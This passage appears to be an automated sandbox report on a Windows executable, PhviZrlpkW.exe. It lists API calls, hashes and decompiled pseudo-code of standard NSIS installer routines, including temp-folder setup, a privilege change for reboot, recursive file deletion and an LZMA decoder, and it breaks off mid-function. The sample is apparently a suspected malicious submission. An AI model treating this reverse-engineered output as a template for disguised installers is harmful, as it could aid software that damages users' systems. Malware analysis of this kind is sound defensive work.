                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403939
                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040394D
                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403955
                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
                    • DeleteFileW.KERNELBASE(1033), ref: 00403982
                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A69
                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A78
                      • Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A83
                    • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00436800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,?), ref: 00403A8F
                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
                    • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
                    • CopyFileW.KERNEL32(C:\Users\user\Desktop\PhviZrlpkW.exe,00420F08,00000001), ref: 00403B21
                    • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
                    • ExitProcess.KERNEL32(?), ref: 00403B6C
                    • OleUninitialize.OLE32(?), ref: 00403B71
                    • ExitProcess.KERNEL32 ref: 00403B8B
                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
                    • OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
                    • ExitProcess.KERNEL32 ref: 00403C1F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                    • String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\PhviZrlpkW.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                    • API String ID: 2292928366-462549642
                    • Opcode ID: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                    • Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
                    • Opcode Fuzzy Hash: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                    • Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 98%
                    			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
                    				signed int _v8;
                    				signed int _v12;
                    				short _v556;
                    				short _v558;
                    				struct _WIN32_FIND_DATAW _v604;
                    				signed int _t38;
                    				signed int _t52;
                    				signed int _t55;
                    				signed int _t62;
                    				void* _t64;
                    				signed char _t65;
                    				WCHAR* _t66;
                    				void* _t67;
                    				WCHAR* _t68;
                    				void* _t70;
                    
                    				_t65 = _a8;
                    				_t68 = _a4;
                    				_v8 = _t65 & 0x00000004;
                    				_t38 = E0040603F(__eflags, _t68);
                    				_v12 = _t38;
                    				if((_t65 & 0x00000008) != 0) {
                    					_t62 = DeleteFileW(_t68); // executed
                    					asm("sbb eax, eax");
                    					_t64 =  ~_t62 + 1;
                    					 *0x42a2e8 =  *0x42a2e8 + _t64;
                    					return _t64;
                    				}
                    				_a4 = _t65;
                    				_t8 =  &_a4;
                    				 *_t8 = _a4 & 0x00000001;
                    				__eflags =  *_t8;
                    				if( *_t8 == 0) {
                    					L5:
                    					E00406668(0x425750, _t68);
                    					__eflags = _a4;
                    					if(_a4 == 0) {
                    						E00405F83(_t68);
                    					} else {
                    						lstrcatW(0x425750, L"\\*.*");
                    					}
                    					__eflags =  *_t68;
                    					if( *_t68 != 0) {
                    						L10:
                    						lstrcatW(_t68, 0x40a014);
                    						L11:
                    						_t66 =  &(_t68[lstrlenW(_t68)]);
                    						_t38 = FindFirstFileW(0x425750,  &_v604); // executed
                    						_t70 = _t38;
                    						__eflags = _t70 - 0xffffffff;
                    						if(_t70 == 0xffffffff) {
                    							L26:
                    							__eflags = _a4;
                    							if(_a4 != 0) {
                    								_t30 = _t66 - 2;
                    								 *_t30 =  *(_t66 - 2) & 0x00000000;
                    								__eflags =  *_t30;
                    							}
                    							goto L28;
                    						} else {
                    							goto L12;
                    						}
                    						do {
                    							L12:
                    							__eflags = _v604.cFileName - 0x2e;
                    							if(_v604.cFileName != 0x2e) {
                    								L16:
                    								E00406668(_t66,  &(_v604.cFileName));
                    								__eflags = _v604.dwFileAttributes & 0x00000010;
                    								if(__eflags == 0) {
                    									_t52 = E00405D2C(__eflags, _t68, _v8);
                    									__eflags = _t52;
                    									if(_t52 != 0) {
                    										E004056CA(0xfffffff2, _t68);
                    									} else {
                    										__eflags = _v8 - _t52;
                    										if(_v8 == _t52) {
                    											 *0x42a2e8 =  *0x42a2e8 + 1;
                    										} else {
                    											E004056CA(0xfffffff1, _t68);
                    											E00406428(_t67, _t68, 0);
                    										}
                    									}
                    								} else {
                    									__eflags = (_a8 & 0x00000003) - 3;
                    									if(__eflags == 0) {
                    										E00405D74(__eflags, _t68, _a8);
                    									}
                    								}
                    								goto L24;
                    							}
                    							__eflags = _v558;
                    							if(_v558 == 0) {
                    								goto L24;
                    							}
                    							__eflags = _v558 - 0x2e;
                    							if(_v558 != 0x2e) {
                    								goto L16;
                    							}
                    							__eflags = _v556;
                    							if(_v556 == 0) {
                    								goto L24;
                    							}
                    							goto L16;
                    							L24:
                    							_t55 = FindNextFileW(_t70,  &_v604); // executed
                    							__eflags = _t55;
                    						} while (_t55 != 0);
                    						_t38 = FindClose(_t70); // executed
                    						goto L26;
                    					}
                    					__eflags =  *0x425750 - 0x5c;
                    					if( *0x425750 != 0x5c) {
                    						goto L11;
                    					}
                    					goto L10;
                    				} else {
                    					__eflags = _t38;
                    					if(_t38 == 0) {
                    						L28:
                    						__eflags = _a4;
                    						if(_a4 == 0) {
                    							L36:
                    							return _t38;
                    						}
                    						__eflags = _v12;
                    						if(_v12 != 0) {
                    							_t38 = E0040699E(_t68);
                    							__eflags = _t38;
                    							if(_t38 == 0) {
                    								goto L36;
                    							}
                    							E00405F37(_t68);
                    							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
                    							__eflags = _t38;
                    							if(_t38 != 0) {
                    								return E004056CA(0xffffffe5, _t68);
                    							}
                    							__eflags = _v8;
                    							if(_v8 == 0) {
                    								goto L30;
                    							}
                    							E004056CA(0xfffffff1, _t68);
                    							return E00406428(_t67, _t68, 0);
                    						}
                    						L30:
                    						 *0x42a2e8 =  *0x42a2e8 + 1;
                    						return _t38;
                    					}
                    					__eflags = _t65 & 0x00000002;
                    					if((_t65 & 0x00000002) == 0) {
                    						goto L28;
                    					}
                    					goto L5;
                    				}
                    			}



















                    APIs
                    • DeleteFileW.KERNELBASE(?,?,7476FAA0,7476F560,00000000), ref: 00405D9D
                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nse83F2.tmp\*.*,\*.*), ref: 00405DE5
                    • lstrcatW.KERNEL32(?,0040A014), ref: 00405E08
                    • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nse83F2.tmp\*.*,?,?,7476FAA0,7476F560,00000000), ref: 00405E0E
                    • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nse83F2.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nse83F2.tmp\*.*,?,?,7476FAA0,7476F560,00000000), ref: 00405E1E
                    • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                    • FindClose.KERNELBASE(00000000), ref: 00405ECD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                    • String ID: .$.$C:\Users\user\AppData\Local\Temp\nse83F2.tmp\*.*$\*.*
                    • API String ID: 2035342205-3283497432
                    • Opcode ID: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                    • Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
                    • Opcode Fuzzy Hash: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                    • Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    C-Code - Quality: 98%
                    			E00406D5F() {
                    				unsigned short _t531;
                    				signed int _t532;
                    				void _t533;
                    				void* _t534;
                    				signed int _t535;
                    				signed int _t565;
                    				signed int _t568;
                    				signed int _t590;
                    				signed int* _t607;
                    				void* _t614;
                    
                    				L0:
                    				while(1) {
                    					L0:
                    					if( *(_t614 - 0x40) != 0) {
                    						 *(_t614 - 0x34) = 1;
                    						 *(_t614 - 0x84) = 7;
                    						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                    						L132:
                    						 *(_t614 - 0x54) = _t607;
                    						L133:
                    						_t531 =  *_t607;
                    						_t590 = _t531 & 0x0000ffff;
                    						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                    						if( *(_t614 - 0xc) >= _t565) {
                    							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                    							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                    							 *(_t614 - 0x40) = 1;
                    							_t532 = _t531 - (_t531 >> 5);
                    							 *_t607 = _t532;
                    						} else {
                    							 *(_t614 - 0x10) = _t565;
                    							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                    							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                    						}
                    						if( *(_t614 - 0x10) >= 0x1000000) {
                    							L139:
                    							_t533 =  *(_t614 - 0x84);
                    							L140:
                    							 *(_t614 - 0x88) = _t533;
                    							goto L1;
                    						} else {
                    							L137:
                    							if( *(_t614 - 0x6c) == 0) {
                    								 *(_t614 - 0x88) = 5;
                    								goto L170;
                    							}
                    							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                    							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                    							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                    							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                    							goto L139;
                    						}
                    					} else {
                    						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                    						__esi =  *(__ebp - 0x60);
                    						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                    						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                    						__ecx =  *(__ebp - 0x3c);
                    						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                    						__ecx =  *(__ebp - 4);
                    						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                    						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                    						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                    						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                    						if( *(__ebp - 0x38) >= 4) {
                    							if( *(__ebp - 0x38) >= 0xa) {
                    								_t97 = __ebp - 0x38;
                    								 *_t97 =  *(__ebp - 0x38) - 6;
                    							} else {
                    								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                    							}
                    						} else {
                    							 *(__ebp - 0x38) = 0;
                    						}
                    						if( *(__ebp - 0x34) == __edx) {
                    							__ebx = 0;
                    							__ebx = 1;
                    							L60:
                    							__eax =  *(__ebp - 0x58);
                    							__edx = __ebx + __ebx;
                    							__ecx =  *(__ebp - 0x10);
                    							__esi = __edx + __eax;
                    							__ecx =  *(__ebp - 0x10) >> 0xb;
                    							__ax =  *__esi;
                    							 *(__ebp - 0x54) = __esi;
                    							__edi = __ax & 0x0000ffff;
                    							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                    							if( *(__ebp - 0xc) >= __ecx) {
                    								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    								__cx = __ax;
                    								_t216 = __edx + 1; // 0x1
                    								__ebx = _t216;
                    								__cx = __ax >> 5;
                    								 *__esi = __ax;
                    							} else {
                    								 *(__ebp - 0x10) = __ecx;
                    								0x800 = 0x800 - __edi;
                    								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    								__ebx = __ebx + __ebx;
                    								 *__esi = __cx;
                    							}
                    							 *(__ebp - 0x44) = __ebx;
                    							if( *(__ebp - 0x10) >= 0x1000000) {
                    								L59:
                    								if(__ebx >= 0x100) {
                    									goto L54;
                    								}
                    								goto L60;
                    							} else {
                    								L57:
                    								if( *(__ebp - 0x6c) == 0) {
                    									 *(__ebp - 0x88) = 0xf;
                    									goto L170;
                    								}
                    								__ecx =  *(__ebp - 0x70);
                    								__eax =  *(__ebp - 0xc);
                    								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    								_t202 = __ebp - 0x70;
                    								 *_t202 =  *(__ebp - 0x70) + 1;
                    								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    								goto L59;
                    							}
                    						} else {
                    							__eax =  *(__ebp - 0x14);
                    							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    							if(__eax >=  *(__ebp - 0x74)) {
                    								__eax = __eax +  *(__ebp - 0x74);
                    							}
                    							__ecx =  *(__ebp - 8);
                    							__ebx = 0;
                    							__ebx = 1;
                    							__al =  *((intOrPtr*)(__eax + __ecx));
                    							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                    							L40:
                    							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                    							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                    							__ecx =  *(__ebp - 0x58);
                    							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                    							 *(__ebp - 0x48) = __eax;
                    							__eax = __eax + 1;
                    							__eax = __eax << 8;
                    							__eax = __eax + __ebx;
                    							__esi =  *(__ebp - 0x58) + __eax * 2;
                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                    							__ax =  *__esi;
                    							 *(__ebp - 0x54) = __esi;
                    							__edx = __ax & 0x0000ffff;
                    							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                    							if( *(__ebp - 0xc) >= __ecx) {
                    								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    								__cx = __ax;
                    								 *(__ebp - 0x40) = 1;
                    								__cx = __ax >> 5;
                    								__ebx = __ebx + __ebx + 1;
                    								 *__esi = __ax;
                    							} else {
                    								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                    								 *(__ebp - 0x10) = __ecx;
                    								0x800 = 0x800 - __edx;
                    								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                    								__ebx = __ebx + __ebx;
                    								 *__esi = __cx;
                    							}
                    							 *(__ebp - 0x44) = __ebx;
                    							if( *(__ebp - 0x10) >= 0x1000000) {
                    								L38:
                    								__eax =  *(__ebp - 0x40);
                    								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                    									while(1) {
                    										if(__ebx >= 0x100) {
                    											break;
                    										}
                    										__eax =  *(__ebp - 0x58);
                    										__edx = __ebx + __ebx;
                    										__ecx =  *(__ebp - 0x10);
                    										__esi = __edx + __eax;
                    										__ecx =  *(__ebp - 0x10) >> 0xb;
                    										__ax =  *__esi;
                    										 *(__ebp - 0x54) = __esi;
                    										__edi = __ax & 0x0000ffff;
                    										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                    										if( *(__ebp - 0xc) >= __ecx) {
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    											__cx = __ax;
                    											_t169 = __edx + 1; // 0x1
                    											__ebx = _t169;
                    											__cx = __ax >> 5;
                    											 *__esi = __ax;
                    										} else {
                    											 *(__ebp - 0x10) = __ecx;
                    											0x800 = 0x800 - __edi;
                    											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    											__ebx = __ebx + __ebx;
                    											 *__esi = __cx;
                    										}
                    										 *(__ebp - 0x44) = __ebx;
                    										if( *(__ebp - 0x10) < 0x1000000) {
                    											L45:
                    											if( *(__ebp - 0x6c) == 0) {
                    												 *(__ebp - 0x88) = 0xe;
                    												goto L170;
                    											}
                    											__ecx =  *(__ebp - 0x70);
                    											__eax =  *(__ebp - 0xc);
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											_t155 = __ebp - 0x70;
                    											 *_t155 =  *(__ebp - 0x70) + 1;
                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    										}
                    									}
                    									L53:
                    									_t172 = __ebp - 0x34;
                    									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                    									L54:
                    									__al =  *(__ebp - 0x44);
                    									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                    									L55:
                    									if( *(__ebp - 0x64) == 0) {
                    										 *(__ebp - 0x88) = 0x1a;
                    										goto L170;
                    									}
                    									__ecx =  *(__ebp - 0x68);
                    									__al =  *(__ebp - 0x5c);
                    									__edx =  *(__ebp - 8);
                    									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                    									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                    									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                    									 *( *(__ebp - 0x68)) = __al;
                    									__ecx =  *(__ebp - 0x14);
                    									 *(__ecx +  *(__ebp - 8)) = __al;
                    									__eax = __ecx + 1;
                    									__edx = 0;
                    									_t191 = __eax %  *(__ebp - 0x74);
                    									__eax = __eax /  *(__ebp - 0x74);
                    									__edx = _t191;
                    									L79:
                    									 *(__ebp - 0x14) = __edx;
                    									L80:
                    									 *(__ebp - 0x88) = 2;
                    									goto L1;
                    								}
                    								if(__ebx >= 0x100) {
                    									goto L53;
                    								}
                    								goto L40;
                    							} else {
                    								L36:
                    								if( *(__ebp - 0x6c) == 0) {
                    									 *(__ebp - 0x88) = 0xd;
                    									L170:
                    									_t568 = 0x22;
                    									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                    									_t535 = 0;
                    									L172:
                    									return _t535;
                    								}
                    								__ecx =  *(__ebp - 0x70);
                    								__eax =  *(__ebp - 0xc);
                    								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    								_t121 = __ebp - 0x70;
                    								 *_t121 =  *(__ebp - 0x70) + 1;
                    								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    								goto L38;
                    							}
                    						}
                    					}
                    					L1:
                    					_t534 =  *(_t614 - 0x88);
                    					if(_t534 > 0x1c) {
                    						L171:
                    						_t535 = _t534 | 0xffffffff;
                    						goto L172;
                    					}
                    					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                    						case 0:
                    							if( *(_t614 - 0x6c) == 0) {
                    								goto L170;
                    							}
                    							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                    							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                    							_t534 =  *( *(_t614 - 0x70));
                    							if(_t534 > 0xe1) {
                    								goto L171;
                    							}
                    							_t538 = _t534 & 0x000000ff;
                    							_push(0x2d);
                    							asm("cdq");
                    							_pop(_t570);
                    							_push(9);
                    							_pop(_t571);
                    							_t610 = _t538 / _t570;
                    							_t540 = _t538 % _t570 & 0x000000ff;
                    							asm("cdq");
                    							_t605 = _t540 % _t571 & 0x000000ff;
                    							 *(_t614 - 0x3c) = _t605;
                    							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                    							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                    							_t613 = (0x300 << _t605 + _t610) + 0x736;
                    							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                    								L10:
                    								if(_t613 == 0) {
                    									L12:
                    									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                    									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                    									goto L15;
                    								} else {
                    									goto L11;
                    								}
                    								do {
                    									L11:
                    									_t613 = _t613 - 1;
                    									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                    								} while (_t613 != 0);
                    								goto L12;
                    							}
                    							if( *(_t614 - 4) != 0) {
                    								GlobalFree( *(_t614 - 4));
                    							}
                    							_t534 = GlobalAlloc(0x40, 0x600); // executed
                    							 *(_t614 - 4) = _t534;
                    							if(_t534 == 0) {
                    								goto L171;
                    							} else {
                    								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                    								goto L10;
                    							}
                    						case 1:
                    							L13:
                    							__eflags =  *(_t614 - 0x6c);
                    							if( *(_t614 - 0x6c) == 0) {
                    								 *(_t614 - 0x88) = 1;
                    								goto L170;
                    							}
                    							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                    							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                    							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                    							_t45 = _t614 - 0x48;
                    							 *_t45 =  *(_t614 - 0x48) + 1;
                    							__eflags =  *_t45;
                    							L15:
                    							if( *(_t614 - 0x48) < 4) {
                    								goto L13;
                    							}
                    							_t546 =  *(_t614 - 0x40);
                    							if(_t546 ==  *(_t614 - 0x74)) {
                    								L20:
                    								 *(_t614 - 0x48) = 5;
                    								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                    								goto L23;
                    							}
                    							 *(_t614 - 0x74) = _t546;
                    							if( *(_t614 - 8) != 0) {
                    								GlobalFree( *(_t614 - 8));
                    							}
                    							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                    							 *(_t614 - 8) = _t534;
                    							if(_t534 == 0) {
                    								goto L171;
                    							} else {
                    								goto L20;
                    							}
                    						case 2:
                    							L24:
                    							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                    							 *(_t614 - 0x84) = 6;
                    							 *(_t614 - 0x4c) = _t553;
                    							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                    							goto L132;
                    						case 3:
                    							L21:
                    							__eflags =  *(_t614 - 0x6c);
                    							if( *(_t614 - 0x6c) == 0) {
                    								 *(_t614 - 0x88) = 3;
                    								goto L170;
                    							}
                    							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                    							_t67 = _t614 - 0x70;
                    							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                    							__eflags =  *_t67;
                    							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                    							L23:
                    							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                    							if( *(_t614 - 0x48) != 0) {
                    								goto L21;
                    							}
                    							goto L24;
                    						case 4:
                    							goto L133;
                    						case 5:
                    							goto L137;
                    						case 6:
                    							goto L0;
                    						case 7:
                    							__eflags =  *(__ebp - 0x40) - 1;
                    							if( *(__ebp - 0x40) != 1) {
                    								__eax =  *(__ebp - 0x24);
                    								 *(__ebp - 0x80) = 0x16;
                    								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                    								__eax =  *(__ebp - 0x28);
                    								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                    								__eax =  *(__ebp - 0x2c);
                    								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                    								__eax = 0;
                    								__eflags =  *(__ebp - 0x38) - 7;
                    								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                    								__al = __al & 0x000000fd;
